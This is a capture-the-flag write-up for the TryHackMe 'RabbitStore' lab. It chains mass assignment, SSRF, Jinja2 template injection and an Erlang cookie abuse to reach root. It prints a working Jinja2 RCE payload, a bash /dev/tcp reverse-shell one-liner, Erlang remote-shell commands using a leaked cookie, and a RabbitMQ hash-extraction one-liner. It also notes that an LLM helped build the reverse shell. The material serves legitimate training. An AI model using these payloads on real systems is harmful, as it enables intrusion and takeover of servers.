
TryHackMe: RabbitStore

·1537 words·8 mins
Liam Smydo

Platform: TryHackMe

Difficulty: Medium

Category: Web Exploitation

Areas Covered: Web enumeration, SSRF, SSTI, JWT manipulation, Erlang cookie RCE.


Overview
#

Rabbit Store is a medium-difficulty machine that chains together several web vulnerabilities into a full system compromise. The attack path runs from a public-facing marketing site all the way to root, touching on JWT abuse, mass assignment, server-side request forgery, and Jinja2 server-side template injection along the way. Privilege escalation leans on a misconfigured RabbitMQ service and its Erlang cookie.


Reconnaissance
#

Port Scanning
#

The first step on any engagement is figuring out what’s actually running. I use RustScan.

┌──(parallels㉿Kali)-[~/targets/rabbitstore]
└─$ rustscan -a 10.81.141.84 -- -A -oN scan.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/parallels/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.81.141.84:22
Open 10.81.141.84:80
Open 10.81.141.84:4369
Open 10.81.141.84:25672
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -oN scan.txt" on ip 10.81.141.84
Depending on the complexity of the script, results may take some time to appear.

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 62 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

80/tcp    open  http    syn-ack ttl 62 Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://cloudsite.thm/

4369/tcp  open  epmd    syn-ack ttl 62 Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672

25672/tcp open  unknown syn-ack ttl 62

A few things stand out immediately. The web server on port 80 redirects to cloudsite.thm, which means we need to add a hosts entry.
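For reference, a sketch of the hosts entry. The demo below writes to a scratch file so it doesn't need root; on the attack box you would append to /etc/hosts itself with sudo tee.

```shell
# Scratch copy so the demo doesn't need root; on a real engagement,
# point HOSTS at /etc/hosts and run the tee under sudo.
HOSTS=./hosts.demo
touch "$HOSTS"
echo '10.81.141.84 cloudsite.thm' | tee -a "$HOSTS"
grep -c 'cloudsite.thm' "$HOSTS"
```

Any further subdomains discovered later get appended to the same line or as additional entries.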

More interestingly, ports 4369 and 25672 reveal an Erlang Port Mapper Daemon (EPMD) with a registered node called rabbit, a strong hint that RabbitMQ is running on this machine. I bookmarked this HackTricks EPMD article for later.

HackTricks EPMD reference showing RabbitMQ attack paths

Web Enumeration
#

Visiting port 80 brings up a standard marketing site for a cloud storage service.

cloudsite.thm landing page

The contact form on the site is non-functional.

Non-functional contact form

The About Us page lists some potential usernames worth noting down for later.

About Us page listing potential usernames

The more interesting discovery came from directory fuzzing:

Directory fuzzing results showing /assets with directory listing enabled

Directory listing is enabled on /assets, which leaks the site’s file structure. Not immediately exploitable, but worth noting.

/assets directory listing

Virtual Host Discovery
#

Clicking “Create Account” redirected me to storage.cloudsite.thm, a separate subdomain. I added this to /etc/hosts and refreshed to land on the registration page.

Registration page on storage.cloudsite.thm

I also ran a VHOST fuzzing scan to check for other subdomains, but storage was the only one present.

VHOST fuzzing results — only storage found


Initial Access
#

JWT Inspection and Mass Assignment
#

I registered a test account and tried to log in. I was redirected to /inactive. The application rejected the login with:

“Sorry, this service is only for internal users working within the organization and our clients. If you are one of our clients, please ask the administrator to activate your subscription.”

Login blocked due to inactive subscription

Navigating to /active confirmed the subscription was inactive. Intercepting the login response in Burp Suite revealed that the application was issuing a JSON Web Token:

Burp Suite showing JWT in response

I also realized here that the registration endpoint lived at /api/register, so I decided to fuzz /api since it was new to us.

Fuzzing /api in Burp Suite

The fuzz uncovered docs, uploads, and more.

Decoding the token at jwt.io showed the structure clearly: the token’s payload contained a subscription field controlling access.
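Nothing about that inspection actually needs jwt.io: a JWT's middle segment is just base64url-encoded JSON. A minimal sketch with a stand-in token (not the one the target issued; real JWTs also strip the '=' padding, which is kept here so base64 -d stays happy):

```shell
# Build a stand-in token: header.payload.signature, payload base64-encoded.
PAYLOAD='{"email":"test@test.thm","subscription":"inactive"}'
SEG=$(printf '%s' "$PAYLOAD" | base64 -w0)
TOKEN="eyJhbGciOiJIUzI1NiJ9.${SEG}.sig"
# The middle segment decodes without knowing the signing key:
echo "$TOKEN" | cut -d. -f2 | base64 -d
# → {"email":"test@test.thm","subscription":"inactive"}
```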

JWT decoded at jwt.io showing subscription field

Since we don’t have the signing key, we can’t forge a new token, but we don’t need to. Instead, I tested whether the registration endpoint would accept an arbitrary subscription field in the request body. This is a classic mass assignment vulnerability, where the server blindly trusts user-supplied fields without validating or filtering them.
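A hedged reconstruction of that test: take the normal registration body and smuggle in the server-controlled field. The /api/register path comes from the Burp traffic; the exact field names on your instance may differ.

```shell
# Normal registration body, plus the smuggled "subscription" field.
BASE='{"email":"pwn@test.thm","password":"Password123!"}'
EVIL=$(printf '%s' "$BASE" | sed 's/}$/,"subscription":"active"}/')
echo "$EVIL"
# → {"email":"pwn@test.thm","password":"Password123!","subscription":"active"}
# Replay against the target (network call, shown for reference only):
#   curl -s -X POST http://storage.cloudsite.thm/api/register \
#        -H 'Content-Type: application/json' -d "$EVIL"
```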

Sending the registration request with "subscription": "active" included:

Burp Suite registration request with subscription field added

It worked. The application created the account with an active subscription and issued a JWT reflecting that state. Logging in now granted access to the storage dashboard.

Logged-in dashboard after mass assignment exploit


Exploitation
#

SSRF via “Upload from URL” Feature
#

The dashboard offered two upload options: a standard file upload, and an “upload from URL” feature, which is almost always worth probing for Server-Side Request Forgery (SSRF). SSRF lets an attacker make the server issue HTTP requests on their behalf, potentially reaching internal services that aren’t exposed externally.

Upload panel showing both upload options

Testing with http://localhost as the URL,

SSRF test — localhost content retrieved

the server fetched the content and saved it as a file. Downloading that file confirmed it contained the localhost web response: SSRF confirmed.

Downloaded file contains localhost HTML

Note: specifying a port as localhost:<port> didn’t work, but 127.0.0.1:<port> did.
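Sweeping internal ports through the SSRF then becomes a loop, feeding each candidate URL to the upload-from-URL endpoint. A sketch, with the /api/uploads path, the url key, and the token cookie name all being assumptions reconstructed from the Burp traffic:

```shell
TOKEN='<your JWT>'   # placeholder: the token issued after registration
for port in 3000 5672 15672 8080; do
  echo "[*] probing http://127.0.0.1:${port}"
  # Network call, shown for reference only:
  # curl -s -X POST http://storage.cloudsite.thm/api/uploads \
  #      -H "Cookie: token=${TOKEN}" -H 'Content-Type: application/json' \
  #      -d "{\"url\":\"http://127.0.0.1:${port}\"}"
done
```

Each probe produces a downloadable file whose contents reveal what, if anything, answered on that port.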

Discovering the Internal API
#

I knew from the earlier fuzz results that /api/docs and /api/uploads endpoints existed.

Using the SSRF to probe internal ports, port 3000 returned a “Cannot GET /” error, Express’s default response and a strong indicator that a Node.js service was listening on this port.

Internal port 3000 response — Express server detected


Fetching http://127.0.0.1:3000/api/docs through the SSRF returned API documentation, revealing a previously unknown endpoint: /api/fetch_messages_from_chatbot.

API docs exposing the chatbot endpoint

Server Side Template Injection (SSTI)
#

I sent a minimal request to the new endpoint.

GET method not allowed on chatbot endpoint

A GET request returned “Method Not Allowed”, so I switched to POST:

500 response to the bare POST

We get a 500 response. The API docs noted that all requests to this endpoint are sent as JSON, so the server needed a proper JSON body.

Sending a POST with a Content-Type: application/json header and a username parameter got a response, and critically, the username value was reflected back inside the HTML response. Whenever user input is reflected through a templating engine, SSTI becomes a real possibility.
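A hedged reconstruction of that probe body (per the exposed API docs, username appears to be the only required key; the host and exact path are as discovered earlier):

```shell
# Minimal JSON probe; "username" is the reflected parameter.
BODY='{"username":"test"}'
echo "$BODY"
# Network call, shown for reference only:
#   curl -s -X POST http://<target>/api/fetch_messages_from_chatbot \
#        -H 'Content-Type: application/json' -d "$BODY"
```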

Username reflected in chatbot response

I tested with the classic SSTI payload {{4*4}}:

SSTI confirmed — 16 returned instead of literal {{4*4}}

The server returned 16 instead of the literal string: SSTI confirmed. Attempting {{process.pid}} (a Node.js expression) produced an error that leaked the template engine: Jinja2, a Python-based engine. This narrowed down the exploitation approach considerably.

Error confirming Jinja2 template engine

Using a Jinja2 RCE payload from PayloadsAllTheThings, I confirmed command execution on the server:

RCE confirmed via SSTI payload
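The payload family in question walks Jinja2 object attributes down to Python's builtins and imports os. This is the commonly cited PayloadsAllTheThings-style gadget, sketched here with id as the test command; single quotes inside the payload keep the surrounding JSON valid:

```shell
# Jinja2 RCE gadget: from a template object, reach __builtins__,
# import os, and run a command, reading its output back.
PAYLOAD="{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
printf '{"username":"%s"}\n' "$PAYLOAD"
```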

Getting a Reverse Shell
#

With command execution confirmed, the next step was turning it into a reverse shell. With the help of an LLM, I crafted the reverse shell payload, set up a netcat listener, and triggered execution through the chatbot endpoint:

Reverse shell payload in Burp Suite

Shell caught on netcat listener
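The shape of that payload: the same SSTI gadget with id swapped for a bash reverse-shell one-liner. LHOST and LPORT below are placeholders for your own listener (catch it with nc -lvnp 4444), and when the payload goes into the JSON body, the inner double quotes must be escaped.

```shell
LHOST=10.0.0.1; LPORT=4444   # placeholders for your attack box
CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
# Wrap the command in the SSTI gadget used earlier:
echo "{{ self.__init__.__globals__.__builtins__.__import__('os').popen(\"$CMD\").read() }}"
```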

From here, grabbing user.txt was straightforward:

user.txt retrieved


Privilege Escalation
#

Upgrading the Shell
#

Before diving into enumeration, I upgraded to a fully interactive TTY so I could use tools properly:

Shell upgrade to interactive TTY
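For reference, the usual upgrade sequence, printed here as a cheat-sheet since it is typed interactively: the first line runs in the remote shell, then you background with Ctrl+Z and run the stty line in your local terminal.

```shell
# Cheat-sheet only; these lines are typed into the shells, not run here.
cat <<'EOF'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background, then locally:
stty raw -echo; fg
export TERM=xterm
EOF
```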

Erlang Cookie: Pivoting to RabbitMQ
#

Running LinPEAS highlighted something interesting: the Erlang cookie file is readable by our current user.

╔══════════╣ Analyzing Erlang Files (limit 70)
-r-----r-- 1 rabbitmq rabbitmq 16 Feb 19 14:57 /var/lib/rabbitmq/.erlang.cookie
xswbQpVzm849Ujqd

Erlang nodes use a shared secret cookie for authentication. From the article bookmarked at the beginning of our recon, we know that if you know the cookie, you can connect to any Erlang node on the system and execute arbitrary code in that node’s context.

Using the technique from the HackTricks EPMD article, I used the cookie to spawn a shell as the rabbitmq user:

Using Erlang cookie to get shell as rabbitmq

Shell as rabbitmq user
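A sketch of that technique, printed as a cheat-sheet since it runs on the target. The -setcookie/-sname/-remsh flags follow the HackTricks write-up; rabbit@<hostname> is the node name EPMD advertised, with the hostname left as a placeholder.

```shell
# Cheat-sheet only; these lines are typed on the target, not run here.
cat <<'EOF'
# Connect to the rabbit node using the leaked cookie (short node names):
erl -setcookie xswbQpVzm849Ujqd -sname pwn -remsh rabbit@<hostname>
# In the resulting Erlang shell, commands run as the rabbitmq user:
os:cmd("id").
EOF
```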

Extracting the Root Password from RabbitMQ
#

I found a hint when listing RabbitMQ users: a comment indicating that the machine’s root password is the SHA-256 hash of the RabbitMQ root user’s password.

RabbitMQ user listing with the password hint

Then I used rabbitmqctl to dump the user definitions, which store passwords as base64-encoded hashes:

rabbitmqctl export_definitions /tmp/defs.json

RabbitMQ definitions exported

RabbitMQ stores passwords in a specific format: a base64-encoded string containing a 4-byte salt followed by the SHA-256 hash. To extract just the hash portion for use as a password, I used a one-liner I found online that handles the conversion:

echo <base64_rabbitmq_hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt

Hash extracted and formatted

Authenticating as root with the hash as the password succeeded. As the challenge hinted, the hash itself is the password; no cracking required.

Root Flag
#

root.txt retrieved

Root shell confirmed


Key Takeaways
#

Mass Assignment is easy to miss but common. Registration endpoints often blindly accept whatever fields you send. Always test whether you can inject unexpected fields like role, isAdmin, or subscription into POST bodies, especially when the application tracks state you’d want to control.

Template injection starts with reflection. Whenever you see your input mirrored back in a response, probe for SSTI. The {{7*7}} test is quick and low-risk: if you get 49 back, you have a serious issue to investigate.

Service credentials can cascade. The Erlang cookie gave access to RabbitMQ, which stored credentials that unlocked root. In real environments, service accounts and their stored secrets are key attack surfaces during privilege escalation.

Read the hints the machine gives you. The machine name, open ports, and user comments in the application all pointed toward RabbitMQ from the very beginning. Paying attention to that context saved time during the escalation phase.